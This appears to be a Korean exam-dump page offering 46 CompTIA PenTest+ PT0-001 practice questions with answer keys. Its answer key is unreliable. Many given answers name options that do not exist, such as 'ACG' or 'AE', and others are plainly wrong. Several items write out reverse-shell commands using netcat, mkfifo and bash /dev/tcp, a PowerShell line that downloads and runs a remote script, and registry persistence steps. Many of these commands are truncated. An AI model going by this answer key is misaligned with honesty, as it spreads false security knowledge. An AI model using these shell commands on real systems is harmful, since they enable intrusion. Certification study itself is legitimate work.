아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

CompTIA PT0-001 인증 시험 문제 및 답변, CompTIA 펜 테스트 + 인증 | SPOTO

종합적인 자료로 CompTIA PenTest+ (PT0-001) 자격증 시험을 준비하세요. 최신 시험 문제로 구성된 모의고사는 시험 준비 과정에서 탁월한 성과를 거둘 수 있도록 설계되었습니다. PT0-001 자격증은 기존 데스크톱 및 서버와 함께 클라우드 및 모바일 플랫폼을 포함한 다양한 환경에서 응시자를 테스트하여 실무 능력에 중점을 둔 것이 특징입니다. 시험 문제, 샘플 문제, 시험 덤프와 함께 연습하면 시험 내용을 깊이 이해하고 문제를 해결할 수 있는 충분한 준비를 갖추게 됩니다. 모의 시험과 시험 시뮬레이터를 통해 시험 준비 상태를 더욱 강화하여 시험 당일에 성공할 수 있도록 준비할 수 있습니다. 시험 자료와 시험 답안을 활용하여 자신감을 높이고 CompTIA PenTest+ 자격증 목표를 달성하세요.
다른 온라인 시험에 응시하세요

질문 #1
모의 침투 테스터가 다음 명령을 실행합니다: 다음 중 공격자가 악용하고 있는 로컬 호스트 취약점은 무엇입니까?
A. 안전하지 않은 파일 권한
B. 애플리케이션 화이트리스트
C. 셸 탈출
D. 쓰기 가능한 서비스
답변 보기
정답: D
질문 #2
모의 침투 테스터가 운영에 대한 전반적인 위험 수준을 설명하는 보고서를 작성하는 중입니다. 침투 테스터는 다음 중 보고서의 어느 영역에 이 내용을 넣어야 하나요?
A. 부록
B. 요약
C. 기술 요약
D. 본체
답변 보기
정답: B
질문 #3
다음 파이썬 스크립트가 주어집니다: 다음 중 출력이 출력되는 위치는 어디일까요?
A. 화면으로
B. 네트워크 서버로
C. 파일로
D. To /dev/null
답변 보기
정답: A
질문 #4
침투 테스터가 무선 스니퍼의 다음 출력을 검토하고 있습니다: 다음 중 위의 정보로부터 추정할 수 있는 것은?
A. 하드웨어 공급업체
B. 채널 간섭
C. 사용자 이름
D. 주요 강점
답변 보기
정답: ACG
질문 #5
모의 침투 테스터가 IP 10.0.0.20의 원격으로 손상된 호스트에서 그래픽 콘솔 창을 시작하고 IP 192.168.1.10의 로컬 컴퓨터에서 터미널을 표시하려고 합니다. 다음 중 이 작업을 수행할 수 있는 방법은?
A. 원격 컴퓨터에서 다음 명령을 실행합니다: export XHOST 192
B. 로컬 컴퓨터에서 다음 명령을 실행합니다: ssh -L4444:127
C. 원격 컴퓨터에서 다음 명령을 실행합니다
D. 로컬 컴퓨터에서 다음 명령을 실행합니다: nc -l -p 6000 그런 다음 원격 컴퓨터에서 다음 명령을 실행합니다: xterm | nc 192
답변 보기
정답: D
질문 #6
보안 컨설턴트가 다가오는 모의 침투 테스트의 범위를 설명하는 문서를 받습니다. 이 문서에는 각각 스캔할 수 있는 IP 주소와 시간이 포함되어 있습니다. 다음 중 이 정보가 포함될 수 있는 것은 무엇인가요?
A. 참여 규칙
B. 제안 요청
C. 마스터 서비스 계약
D. 비즈니스 영향 분석
답변 보기
정답: A
질문 #7
클라이언트가 규정 준수 목적으로 외부 네트워크 모의 침투 테스트를 요청했습니다. 클라이언트와 모의 침투 테스터 간의 논의 중에 클라이언트가 모의 침투 테스터의 소스 IP 주소를 테스트 기간 동안 클라이언트의 IPS 화이트리스트에 추가할 의사가 없음을 밝힙니다. 다음 중 모의 침투 테스터의 소스 IP 주소를 화이트리스트에 추가해야 하는 이유에 대한 가장 적합한 논거는 무엇인가요?
A. 화이트리스트는 IPS 및 지원 로그 모니터링 시스템에 대한 의도하지 않은 DoS 공격을 방지합니다
B. 타사 IPS 시스템에 대한 침투 테스트는 종종 추가 문서와 승인이 필요하므로 시간이 촉박한 테스트가 지연될 수 있습니다
C. IPS 화이트리스트 규칙은 지속적으로 개발되는 취약점과 새로 발견된 취약점을 최신 상태로 유지하기 위해 자주 업데이트해야 합니다
D. 테스트는 범위 내 모든 시스템에서 발생할 수 있는 보안 문제를 발견하는 데 초점을 맞춰야 하며, IPS와 같은 능동적 방어의 상대적 효과를 판단하는 데 초점을 맞춰서는 안 됩니다
답변 보기
정답: A
질문 #8
다음 중 물리적 보안 평가 중 '언더 더 도어 도구'를 사용하는 침입 기법의 예는 무엇인가요?
A. 자물쇠 따기
B. 출구 센서 트리거링
C. 잠금 범프
D. 잠금 바이패스
답변 보기
정답: A
질문 #9
모의 침투 테스터가 스위치에 대해 ARP 스푸핑을 수행 중입니다. 침투 테스터가 가장 많은 정보를 얻기 위해 스푸핑해야 하는 것은 다음 중 어느 것입니까?
A. 클라이언트의 MAC 주소
B. 도메인 컨트롤러의 MAC 주소
C. 웹 서버의 MAC 주소
D. 게이트웨이의 MAC 주소
답변 보기
정답: A
질문 #10
다음 중 메타스플로잇 데이터베이스를 시작하는 명령은 무엇인가요?
A. msfconsole
B. 작업 공간
C. msfvenom
D. db_init
E. db_connect
답변 보기
정답: AB
질문 #11
다음 중 자격증명 무차별 암호 대입 공격을 수행하는 데 사용되는 도구는 무엇인가요?
A. Hydra
B. 존 더 리퍼
C. 해시캣
D. 복숭아
답변 보기
정답: D
질문 #12
의료 기관은 해당 개인의 개인 건강 정보를 보호하고 이를 증명하기 위해 현지 규정을 준수해야 합니다. 침투 테스터가 평가를 수행할 때 특별히 테스트해야 하는 조건은 다음 중 어느 것인가요? (2가지 선택).
A. SNMP 트랩 데이터의 클리어 텍스트 노출
B. IT 발권 시스템에 상주하는 소프트웨어 버그
C. CA에서 정의한 S/MIME 인증서 템플릿
D. HTTP를 통해 전달되는 건강 정보
E. 레코드 서버의 DAR 암호화
답변 보기
정답: A
질문 #13
웹 애플리케이션을 평가하는 동안 모의 침투 테스터는 서버에서 임의의 명령이 실행될 수 있음을 발견합니다. 이 공격을 한 단계 더 발전시키고 싶었던 모의 침투 테스터는 192.168.1.5에서 공격 머신으로 리버스 셸을 되찾을 수 있는 방법을 모색하기 시작합니다. 다음 중 가능한 방법은 무엇인가요? (2가지 선택).
A. NC 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
답변 보기
정답: A
질문 #14
제한된 권한으로 Windows 시스템에서 지속성을 유지하려고 할 때 테스터가 사용해야 하는 레지스트리 키는 다음 중 어느 것인가요?
A. HKEY_CLASSES_ROOT
B. Hkey_local_machine
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
답변 보기
정답: D
질문 #15
한 모의 침투 테스터가 스타트업 회사에 대한 보안 평가를 수행했습니다. 보고서에는 총 10개의 취약점이 나열되어 있으며 5개의 취약점이 심각한 것으로 확인되었습니다. 고객은 모든 취약점을 즉시 수정할 수 있는 리소스가 없습니다. 이러한 상황에서 다음 중 고객에게 가장 적합한 제안은 무엇인가요?
A. 중요한 취약점에 대한 손쉬운 보완 제어를 적용하여 위험을 최소화한 다음 해결 우선순위를 다시 정하세요
B. 가장 빨리 해결할 수 있는 문제를 파악하여 먼저 해결합니다
C. 중요 취약점 중 영향이 가장 적은 취약점을 먼저 개선한 다음 다른 중요 취약점을 해결합니다
D. 다른 취약점을 수정하는 데 시간이 오래 걸리더라도 가장 중요한 취약점을 먼저 수정하세요
답변 보기
정답: B
질문 #16
침투 테스터가 NETBIOS 이름 서비스를 표적으로 삼으려 합니다. 다음 중 NETBIOS 이름 서비스를 익스플로잇할 가능성이 가장 높은 명령은 무엇인가요?
A. arpspoof
B. nmap
C. 응답자
D. 버프스위트
답변 보기
정답: A
질문 #17
모의 침투 테스터가 애플리케이션이 인터넷 연결 애플리케이션에서 기본 인증만 사용하고 있다고 보고합니다. 다음 중 가장 좋은 해결 전략은 무엇인가요?
A. HTTP 엄격한 전송 보안을 활성화합니다
B. 보안 쿠키 플래그를 활성화합니다
C. 통신 채널을 암호화합니다
D. 유효하지 않은 사용자 입력을 살균합니다
답변 보기
정답: C
질문 #18
리눅스 시스템에 대한 초기 낮은 권한으로 접근한 후, 침투 테스트자는 사용자의 홈 폴더에서 ''changepass'라는 제목의 흥미로운 바이너리를 확인합니다 -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass 테스터는 "문자열"을 사용하여 changepass에서 ASCII 인쇄 가능한 문자를 인쇄하고 다음과 같은 내용을 기록합니다: $ strings changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen 이 정보가 주어지면 다음 중 루트 p를 얻기 위한 가장 가능성 있는 악용 경로는 무엇입니까?
A. 변경 패스를 쓰기 가능한 디렉터리에 복사하고 ENV_PATH 환경 변수를 토큰을 훔치는 바이너리 경로인 changepw의 경로로 내보냅니다
B. 같은 디렉터리에 changepass의 복사본을 만들고 이름을 changepw로 지정합니다
C. ENV_PATH 환경 변수를 토큰을 훔치는 바이너리인 changepw가 포함된 쓰기 가능한 디렉토리의 경로로 내보냅니다
D. 환경 변수를 '/usr/local/bin' 경로로 내보낸 후 sudo를 사용하여 현재 디렉토리 내에서 변경 패스를 실행합니다
답변 보기
정답: A
질문 #19
다음 중 침투 테스트 참여 계약의 속성 중 가장 높은 부하에서 프로덕션 시스템을 관찰하고 테스트하는 데 가장 큰 영향을 미치는 것은?
A. 중요한 프로덕션 시스템의 범위 만들기
B. 테스트 액세스 시간 일정 설정
C. 화이트박스 테스트 참여 설정하기
D. 침입 테스트에 대한 경영진의 승인 받기
답변 보기
정답: C
질문 #20
다음 중 테스터가 케르베로스팅 공격을 수행할 수 있는 시나리오는 무엇인가요?
A. 테스터가 Windows 장치를 손상시켜 LSA 비밀을 덤프했습니다
B. 테스터는 SAM 데이터베이스를 검색하고 비밀번호 해시를 해독해야 합니다
C. 테스터가 제한된 권한을 가진 사용자를 침해했으며 측면 이동을 위해 다른 계정을 타깃으로 삼아야 합니다
D. 테스터가 계정을 손상시켰으므로 시스템에서 해시 및 일반 텍스트 비밀번호를 덤프해야 합니다
답변 보기
정답: B
질문 #21
테스트 중에 클라이언트의 핵심 서버에서 심각한 취약점이 발견되었습니다. 다음 중 다음 중 어떤 조치를 취해야 하나요?
A. 영향을 받는 서비스의 네트워크 포트를 비활성화합니다
B. 모든 조사 결과를 작성한 다음 고객에게 제출합니다
C. 발견한 내용을 고객에게 즉시 알립니다
D. 공격자가 악용할 수 없도록 대상을 오프라인으로 전환합니다
답변 보기
정답: D
질문 #22
보안 평가자가 Windows 애플리케이션으로 수집하는 동안 구문 분석 기능의 보안을 테스트하기 위해 특수 XML 파일을 만들려고 합니다. 애플리케이션 테스트를 시작하기 전에 평가자가 조직에 요청해야 하는 것은 다음 중 어느 것입니까?
A. 샘플 SOAP 메시지
B. REST API 문서
C. 프로토콜 퍼징 유틸리티
D. 해당 XSD 파일
답변 보기
정답: A
질문 #23
다음 중 기업 정책에서 발췌한 내용은 어느 것입니까?
A. 직원 비밀번호는 영숫자를 포함하여 최소 8자 이상이어야 하며, 1자는 영문자이어야 합니다
B. 헬프 데스크에 800-passwd1로 연락하여 비밀번호 재설정을 수행할 수 있습니다
C. 직원은 회사 자산에 액세스할 때 강력한 비밀번호를 사용해야 합니다
D. 회사 시스템은 MD5 해싱 알고리즘을 사용하여 비밀번호를 저장해야 합니다
답변 보기
정답: B
질문 #24
익스플로잇된 머신의 기록 파일에서 다음 줄이 발견되었습니다. 공격자가 다음 명령을 실행했습니다: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 다음 중 이 명령의 기능을 설명하는 것은 무엇인가요?
A. 포트 스캔을 수행합니다
B. 웹 서버의 배너를 가져옵니다
C. TTY를 원격 시스템으로 리디렉션합니다
D. 제공된 IP에 대한 오류 로그를 제거합니다
답변 보기
정답: AC
질문 #25
모의 침투 테스트자는 IT 부서 구성원을 피싱하여 초기 VPN 사용자 도메인 자격 증명을 검색할 수 있었습니다. 그 후, 침투 테스터는 VPN을 통해 해시를 획득하고 사전 공격을 사용하여 쉽게 해시를 크래킹했습니다. 다음 중 어떤 해결 단계가 권장되나요? (3개 선택).
A. 모든 직원에게 보안 인식 교육을 의무적으로 받도록 합니다
B. 원격 액세스를 위한 2단계 인증을 구현합니다
C. 침입 방지 시스템을 설치합니다
D. 비밀번호 복잡성 요건을 높입니다
E. 보안 정보 이벤트 모니터링 솔루션을 설치합니다
F. IT 부서의 구성원이 관리자로 대화형으로 로그인하지 못하도록 합니다
G. VPN 솔루션에 사용되는 암호 제품군을 업그레이드합니다
답변 보기
정답: A
질문 #26
모의 침투 테스트자가 이블 트윈을 성공적으로 배포하고 일부 피해자 트래픽을 확인하기 시작했습니다. 모의 침투 테스터가 수행하려는 다음 단계는 모든 피해 웹 트래픽을 암호화되지 않은 상태로 캡처하는 것입니다. 다음 중 이 목표를 가장 잘 달성할 수 있는 방법은 무엇인가요?
A. HTTP 다운그레이드 공격을 수행합니다
B. 트래픽 암호 해독을 위해 사용자 자격 증명을 수집합니다
C. MITM 공격을 수행합니다
D. 신뢰할 수 있는 CA를 사칭하여 CA 공격을 실행합니다
답변 보기
정답: A
질문 #27
다음 PowerShell 명령을 고려하십시오. powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1";Invoke-Cmdlet 다음 중 이 명령이 수행하는 작업을 가장 잘 설명하는 것은 무엇입니까?
A. 실행 정책을 설정합니다
B. 원격 스크립트를 실행합니다
C. 인코딩된 명령을 실행합니다
D. 객체를 인스턴스화합니다
답변 보기
정답: C
질문 #28
한 에너지 회사가 보안 회사와 계약을 맺고 발전 및 냉각 관리를 위해 ICS를 사용하는 발전소에 대한 침투 테스트를 수행하기로 했습니다. 다음 중 이 회사가 평가를 준비할 때 고려해야 하는 이러한 환경의 고유한 고려 사항은 무엇인가요?
A. 적절한 보안 테스트 도구 세트 선택
B. ICS 구성 요소의 전류 및 부하 정격
C. 잠재적 운영 및 안전 위험
D. 테스트에 사용된 하드웨어의 전기 인증
답변 보기
정답: DE
질문 #29
모의 침투 테스터가 공용 웹 서버에서 여러 개의 높은 번호 포트가 수신 대기 중인 것을 관찰합니다. 그러나 시스템 소유자는 애플리케이션이 포트 443만 사용한다고 말합니다. 다음 중 가장 추천할 만한 것은 무엇인가요?
A. 애플리케이션을 다른 포트로 전환합니다
B. 포트 443을 특정 IP 주소로 필터링합니다
C. 웹 애플리케이션 방화벽을 구현합니다
D. 불필요한 서비스를 비활성화합니다
답변 보기
정답: D
질문 #30
모의 침투 테스터가 서버 팜이 회사의 소프트웨어 기준선을 준수하는지 확인하기 위해 원격 스캔을 수행 중입니다. 다음 중 모의 침투 테스터가 기준 준수를 확인하기 위해 수행해야 하는 작업은 무엇인가요?
A. 검색 검색
B. 스텔스 스캔
C. 전체 스캔
D. 자격 증명 스캔
답변 보기
정답: B
질문 #31
모의 침투 테스터가 은행 애플리케이션을 테스트하다가 취약점을 발견했습니다. 테스터는 데이터에 액세스할 수 없는 비권한 사용자로 로그인되어 있습니다. 웹 가로채기 프록시에서 아래 데이터가 주어졌습니다: 다음 중 어떤 유형의 취약점이 악용되고 있나요?
A. 강제 브라우징 취약점
B. 매개변수 오염 취약성
C. 파일 업로드 취약점
D. 쿠키 열거
답변 보기
정답: A
질문 #32
전체 범위 보안 평가 중에 대상을 물리적으로 교전하여 소셜 엔지니어링하기 위한 전제 조건은 다음 중 어느 것인가요?
A. 비상구 찾기
B. 구실 준비
C. 피해자의 숄더 서핑
D. 피해자 미행
답변 보기
정답: A
질문 #33
보안 분석가에게 조직의 DMZ 환경에 대해 수행된 상세한 침투 보고서가 제공되었습니다. 보고서에는 발견된 취약점의 CVSS 기본 점수가 10.0이라고 명시되어 있었습니다. 이 취약점을 익스플로잇하려면 다음 중 어느 정도의 난이도가 필요하나요?
A. 매우 어렵습니다
B. 다소 어려움; 악용하려면 상당한 처리 능력이 필요합니다
C. 사소함; 이 발견을 악용하는 데는 거의 노력이 필요하지 않습니다
D. 불가능; 외부 호스트는 공격으로부터 보호하기 위해 강화되었습니다
답변 보기
정답: C
질문 #34
악의적인 사용자가 컴퓨터에서 MITM 공격을 수행하려고 합니다. 컴퓨터 네트워크 구성은 다음과 같습니다: IP: 192.168.1.20 NETMASK: 255.255.255.0 기본 게이트웨이: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 다음 중 악성 사용자가 MITM 공격을 수행하기 위해 실행해야 하는 명령은 무엇인가요?
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
답변 보기
정답: D
질문 #35
모의 침투 테스트자가 마케팅 직원의 디바이스에 액세스했습니다. 모의 침투 테스터는 액세스가 발견되면 디바이스의 제어권을 되찾을 수 있는지 확인하려고 합니다. 다음 중 침투 테스터가 디바이스에 대한 지속성을 유지하기 위해 사용해야 하는 조치는 무엇인가요? (2개를 선택하세요.)
A. HKLM\소프트웨어\소프트웨어\현재 버전\실행에 항목을 배치하여 au57d
B. C:\windows\system32\드라이버\등\hosts에 12
C. C:\사용자\%사용자 이름\로컬\앱데이터\로밍\템포\au57d
D. 수동으로 실행할 RTAudio라는 가짜 서비스를 Windows에 생성합니다
E. HKLM\CurrentControlSet\Services\RTAudio에 RTAudio 항목을 배치합니다
F. C:\windows\system32\drivers\등\hosts를 호출하는 일정 작업을 만듭니다
답변 보기
정답: AC
질문 #36
침투 테스터가 텍스트 상자에 SQL 인젝션 명령을 입력하여 데이터베이스의 정보 저장소에 액세스할 수 있었습니다. 다음 중 이 취약점을 완화할 수 있는 최선의 권장 사항은 무엇인가요?
A. 로그인에 사용되는 자격 증명을 무작위로 지정합니다
B. 호스트 기반 침입 탐지를 설치합니다
C. 입력 정규화를 구현합니다
D. 시스템 강화를 수행합니다
답변 보기
정답: AE
질문 #37
다음 중 침투 테스터가 OSINT를 수행하기 위해 활용할 수 있는 도구는 무엇입니까? (2가지 선택).
A. 쇼단
B. SET
C. 쇠고기
D. 와이어샤크
E. 말테고
F. Dynamo
답변 보기
정답: CD
질문 #38
다음 중 모의 침투 테스트가 끝날 때 침투 테스터가 thechkconfig --del servicename 명령을 실행하는 이유는 무엇인가요?
A. 지속성을 제거하려면 다음과 같이 하세요
B. 지속성을 활성화하려면
C. 지속성 보고하기
D. 지속성을 확인하려면
답변 보기
정답: A
질문 #39
다음 중 모의 침투 테스터가 테스트 도중 시스템 소유자/클라이언트와 통신하게 되는 상황은 무엇입니까? (2가지 선택)?
A. 테스터는 시스템에서 개인 식별 데이터를 발견합니다
B. 시스템이 이전에 무단 침해를 당한 증거를 보여줍니다
C. 시스템이 전체적으로 경화가 부족합니다
D. 익스플로잇을 시도한 후 시스템을 사용할 수 없게 됩니다
E. 테스터가 범위를 벗어난 시스템에서 발견한 경우
답변 보기
정답: A
질문 #40
모의 침투 테스터가 다양한 IP 주소에 대한 모든 RPTR 레코드를 검색하는 방법을 스크립트로 작성하려고 합니다. 다음 중 가장 효율적으로 활용할 수 있는 방법은 무엇인가요?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. {1
D. dig -r > echo "8
답변 보기
정답: D
질문 #41
모의 침투 테스트자가 웹 애플리케이션 모의 침투 테스트 중에 콘텐츠 보안 정책 헤더가 누락된 것을 발견했습니다. 다음 중 모의 침투 테스터가 수행할 가능성이 가장 높은 기법은 무엇인가요?
A. 명령어 주입 공격
B. 클릭재킹 공격
C. 디렉토리 트래버스 공격
D. 원격 파일 포함 공격
답변 보기
정답: D
질문 #42
모의 침투 테스터는 웹 애플리케이션의 스캔 결과를 검토합니다. 다음 중 가장 중요하며 익스플로잇에 우선순위를 두어야 하는 취약점은 무엇인가요?
A. 저장된 XSS
B. 채우기 경로 공개
C. 만료된 인증서
D. 클릭재킹
답변 보기
정답: D
질문 #43
모의 침투 테스터는 포트 443을 통해 모든 호스트에 무제한으로 네트워크에 액세스할 수 있는 시스템을 손상시킵니다. 모의 침투 테스터는 피해자로부터 공격자로 역방향 셸을 생성하려고 합니다. 다음 중 모의 침투 테스터가 사용할 가능성이 가장 높은 방법은 무엇인가요?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@-p 443
C. nc -e /bin/sh443
D. bash -i >& /dev/tcp//443 0>&1
답변 보기
정답: D
질문 #44
다음 중 모의 침투 테스트가 끝날 때 침투 테스터가 chkconfig --del servicename 명령을 실행하는 이유는 무엇인가요?
A. 지속성을 제거하려면 다음과 같이 하세요
B. 지속성을 활성화하려면
C. 지속성 보고하기
D. 지속성을 확인하려면
답변 보기
정답: A
질문 #45
다음 중 전기 유틸리티 시설, 천연 가스 시설, 댐 및 원자력 시설에서 사용되는 ICS의 중요한 보안 취약점을 가장 잘 설명하는 것은?
A. ICS 공급업체는 적절한 보안 제어를 구현하는 속도가 느립니다
B. ICS 직원이 기본 업무 수행을 위한 적절한 교육을 받지 않은 경우
C. 중요 기기에 대한 교체 장비가 부족합니다
D. ICS 시설에 대한 규정 준수가 부족합니다
답변 보기
정답: B
질문 #46
소비자 기반 IoT 디바이스는 기존 데스크톱 컴퓨터용으로 구축된 시스템보다 보안이 취약한 경우가 많습니다. 다음 중 그 이유를 가장 잘 설명하는 것은 무엇인가요?
A. IoT 디바이스를 개발하는 제조업체는 보안에 대한 우려가 적습니다
B. 관리자가 전반적으로 동일한 보안 표준을 구현하는 것은 어렵습니다
C. IoT 시스템에는 보다 안전한 솔루션에 필요한 하드웨어 성능이 부족한 경우가 많습니다
D. 규제 당국은 IoT 시스템에 대한 보안 요구 사항이 낮은 경우가 많습니다
답변 보기
정답: A

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: